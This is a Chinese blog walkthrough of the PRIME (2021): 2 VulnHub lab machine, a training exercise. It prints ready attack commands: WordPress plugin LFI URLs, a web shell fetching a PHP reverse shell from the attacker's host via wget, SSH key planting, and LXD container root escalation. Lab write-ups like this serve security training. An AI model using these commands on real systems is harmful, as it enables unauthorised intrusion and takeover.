Vulnhub_PRIME (2021): 2

最新推荐文章于 2023-03-03 19:34:12 发布
最新推荐文章于 2023-03-03 19:34:12 发布
阅读量616 收藏 1
点赞数
分类专栏: 网络攻防 CTF 文章标签: css ssh wordpress nginx nagios
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45434762/article/details/117393588
版权

主机信息

kali: 192.168.254.165
PRIME (2021)_2:192.168.254.166

信息收集

通过nmap扫描目标主机发现开放22、80、139、445、10123端口,并且10123使用python搭建http

nmap -T4 -A -v -p- 192.168.254.166


打开80端口的页面发现是一个介绍页面

查看源码也没有发现有价值的信息

访问10123端口发现应该是某个用户的家目录

我们将所有文件下载下来进行查看

在something文件中发下一些提示

通过目录扫描发现一个wordpress的站点和一个server目录

查看wp目录

查看server目录

下载server目录下的文件,解压后发现是一套网站的源码

使用wpscan得到一个用户名admin

wpscan --url http://192.168.254.166/wp/ --enumerate


在使用wpscan api-token后再次进行扫描发现存在一个LFI漏洞

wpscan --url http://192.168.254.166/wp/ -e --api-token CPW3*********************************ZkfaXk


利用方法

查看passwd

view-source:http://192.168.254.166/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd

GETSHELL

然后访问最开始在10123端口中发现的shell.php文件,并且可以执行命令

http://192.168.254.166/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=id


使用shell.php执行命令将反弹shell的文件下载到目标主机

http://192.168.254.166/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=wget%20http://192.168.254.165:8888/php_re_shell.php%20-O%20/tmp/shell.php


使用php执行上传的文件反弹回一个shell

http://192.168.254.166/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=php%20/tmp/shell.php


使用python获取一个交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash");'


查看wordpress的配置文件得到数据库密码

使用nume4linnux对smb进行扫描发现一个share

enum4linux -A 192.168.254.166


使用smbclient进行连接

smbclient //192.168.254.166/welcome


创建ssh公钥

ssh-keygen -b 2048


将id_rsa.pub复制到tmp目录下命名位authorized_keys

将authorized_keys上传到目标主机的.ssh目录下

然后使用ssh登录到目标主机

查看用户id发现jarves还属于lxd组

首先我们从github下载构建好的Alpine,然后进行执行

git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

提权

然后我们将生成的文件上传至目标机器

wget http://192.168.254.165:8889/alpine-v3.13-x86_64-20210529_0640.tar.gz


使用lxd进行初始化

lxd init


然后导入镜像

lxc image import ./alpine-v3.13-x86_64-20210529_0640.tar.gz  --alias myimage


查看镜像

lxc image list


进入到容器的命令行

lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh


进入mnt/root目录,这个目录包含所有宿主机文件

替换root目录下的authorized_keys文件

最后使用ssh连接拿到root权限

加入我的星球

下方查看历史文章

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

通达OA任意上传&文件包含漏洞复现

扫描二维码

获取更多精彩

NowSec

NowSec
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
vuInhub靶场实战系列-prime:2
06-08
vuInhub靶场实战系列-prime:2
ISOI_Prime:基本1
05-08
Materialize,一个基于材质设计CSS框架 当前版本:v0.97.0 Sass要求: Ruby Sass 3.3 +,LibSass 0.6+ 支持的浏览器: Chrome 35以上版本,Firefox 31以上版本,Safari 7以上版本,IE 10以上版本 ...
vulnhubPRIME (2021): 2
weixin_42478365的博客
02-02 633
文件包含漏洞的利用
[渗透测试学习靶机07] vulnhub靶场 Prime 2
weixin_47112073的博客
10-27 1606
Prime 2这个靶机我看网上很少有人通关打靶练习,自己尝试做了一下,感觉整体难度:比较难,大家可以参考一下。
Vulnhub靶场Prime_Series_Level-1渗透
m0_65712192的博客
02-12 1615
Vulnhub靶场Prime_Series_Level-1渗透
vulnhubprime-2
qwweggfe的博客
08-04 511
ip信息: kali:192.168.181.129 靶机:192.168.181.136 渗透过程 1、信息收集 首先进行IP地址扫描 打开网页进行查看 进行端口扫描 nmap -sC -sV 192.168.181.136 --min-rate=2000 在端口协议上没有任何漏洞 于是对页面进行扫描 发现了wp这个页面进行查看 于是使用wpscan进行扫描,感觉他有漏洞 wpscan --url http://192.168.181.136/w...
渗透测试vulnhub-prime
weixin_50683638的博客
11-25 2719
本次实验需要kali虚拟机和靶机(此次靶机版本为ubuntu16-04)靶机我们不知道ip。 kali和靶机默认nat模式即可 在kali(攻击机ip:192.168.3.129)扫描局域网内C段主机(探测靶机ip) nmap -sP 192.168.3.1/24扫描到靶机ip为192.168.130 扫描ip的端口服务nmap -P 1-65535 -A 192.168.3.130看到22和80端口开启 我们访问一下192.168.3.130查看源码发现并没有什么 我们先目录扫描看看有什么信息,有
prime-numbers-scss::input_numbers::sparkles: 仅使用 SCSS 查找素数
07-24
这个怎么运作简单测试在simple.scss文件中的is_prime()函数中实现。 在其中,我们遍历所有可能的奇数除数直到可除数的平方根,如果没有找到除数(意思是,如果数是素数),我们返回true 。埃拉托色尼筛在...
5_prime_algorithm_compare.rar_C prime_prime
09-14
"5_prime_algorithm_compare.rar_C _prime_prime"这个压缩包文件涉及到C语言实现的5种不同的算法,用于在N个自然数范围内查找素数,并对它们的速度进行了比较。以下是这5种算法的详细介绍,以及它们在效率上的差异:...
Find_The_Prime.rar_The Prime_prime number vhdl
09-20
本项目“Find_The_Prime.rar_The Prime_prime number vhdl”显然是一个使用VHDL编写的电路设计,其目标是实现一个素数搜寻器。下面我们将深入探讨VHDL编程、素数的概念以及如何在硬件中实现素数检测。 1. VHDL基础...
vulnhub prime1通关提权详细思路
m0_61506558的博客
09-24 751
本次模拟渗透测试的流程,从确定目标域名、IP 、主机发现,进行信息收集域名、IP、端口、目录扫描、搜索引擎、网络空间搜索引擎、Git…… 漏洞扫描,利用msf集成的工具,漏洞利用,最终拿到root用户。1、主机发现我的攻击机选择的是kali,在本机我们可以试试找它的网段,方便Nmap进行扫描,我本地使用的是NAT技术,这样我们就可以找到它的网段模式描述特点场景Bridge桥接虚拟机使用物理机的网卡(有线或者无线),不用虚拟网卡,占用一个IP,需要配置IP以后访问互联网。
靶场笔记-Vulnhub Prime
m0_60571990的博客
03-03 120
靶场笔记-Vulnhub Prime
渗透测试怎么搭建靶机_渗透测试实战——prime靶机入侵
weixin_39857876的博客
11-21 335
原创:safe6合天智汇原创投稿活动:http://link.zhihu.com/?target=https%3A//mp.weixin.qq.com/s/Nw2VDyvCpPt_GG5YKTQuUQIp:192.168.0.115Kali:192.168.0.21安装好的靶机界面​Nmap扫描端口【注:Nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。Nmap扫描相关的信息可以...
Prime靶场
wcl20010的博客
05-02 472
prime靶场(vulnhub) 靶场地址:链接:https://pan.baidu.com/s/1jsccNmrmhG2dPuaz6zGwmA 提取码:ap5g 目录 X shell 连接 kali: #首先查看kali是否打开了22端口。ssh协议:ssh远程连接 netstat -an|grep 22 #打开服务 service ssh start 1. 主机发现: #采用nmap nmap -sP 192.168.128.1/24 #直接对128这个网段进行扫描,-sP代表只进行p
vulnhub prime1-发现主机及端口扫描
逆旅行人的博客
08-09 285
这里记录我的玩vulnhub的整个流程,整个测试思路傻瓜式编辑成文,供各位师傅参考,也给自己做个笔记。vulnhub prime1-发现主机及端口扫描
vulnhub prime之2-目录扫描
逆旅行人的博客
08-09 182
vulnhub prime之2-目录扫描
vulnhub Prime1渗透
qq_45455136的博客
03-09 905
Prime1靶场渗透准备环境主机发现端口扫描目录扫描FUZZ和LFIWordPress漏洞扫描Linux内核漏洞提权 准备环境 攻击机与靶机在同一网段下 攻击机:kali 192.168.37.130 靶机:Prime1 未知 主机发现 kali使用namp扫描,得到靶机ip 192.168.37.131 kali使用arp-scan扫描,得到靶机ip kali使用netdiscover扫描,得到靶机ip 端口扫描 kali使用nmap扫描靶机全部端口,发现开放了22端口ssh服务和80端口http
Vulnhub靶机 Prime_Series_Level-1
菜浪马废的博客
04-29 836
换一个参数 secrettier360 返回结果太多 过滤一下 ??? 觉得自己被耍了 这不是saket的密码 我吐了 是victor的 我*****他的 连接成功 以为突破口是env 最后还是内核提权 我用的最后一个漏洞 先在kali上编译 gcc -o poc 45010.c 然后传到靶机上 直接运行 Vulnhub就打到这吧 主要是还要下载 太麻烦了...
Vulnhubprime-1靶场[渗透测试]
qq_60115503的博客
08-29 1082
将下载好的靶场导入VMware,虚拟机设置网络模式为nat模式,即可开启渗透。
def is_prime(n): if n < 2: return False for i in range(2, int(n ** 0.5) + 1): if n % i == 0: return False return True def prime_substr(num): result = [] for i in range(len(num)): for j in range(i+1, len(num)+1): sub_num = int(num[i:j]) if is_prime(sub_num): result.append(sub_num) return result if __name__ == '__main__': num = input("请输入一个正整数:") prime_sub_nums = prime_substr(num) if prime_sub_nums: print(sum(prime_sub_nums)) else: print(0)测试这个程序的运行时间
最新发布
06-12
为了测试这个程序的运行时间,我们可以使用Python的time模块中的time()函数来记录程序开始和结束的时间,并计算二者的差值来得到程序的运行时间。代码如下: ```python import time def is_prime(n): if n < 2: return False for i in range(2, int(n ** 0.5) + 1): if n % i == 0: return False return True def prime_substr(num): result = [] for i in range(len(num)): for j in range(i+1, len(num)+1): sub_num = int(num[i:j]) if is_prime(sub_num): result.append(sub_num) return result if __name__ == '__main__': num = input("请输入一个正整数:") start_time = time.time() # 记录程序开始时间 prime_sub_nums = prime_substr(num) end_time = time.time() # 记录程序结束时间 total_time = end_time - start_time # 计算程序运行时间 if prime_sub_nums: print(sum(prime_sub_nums)) else: print(0) print("程序的运行时间为:{:.4f}秒".format(total_time)) # 输出程序运行时间 ``` 我们运行这段代码,输入一个正整数,程序会输出它的所有素数子串的和,并且输出程序的运行时间。注意,程序运行时间会受到计算机性能和输入数据的影响。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值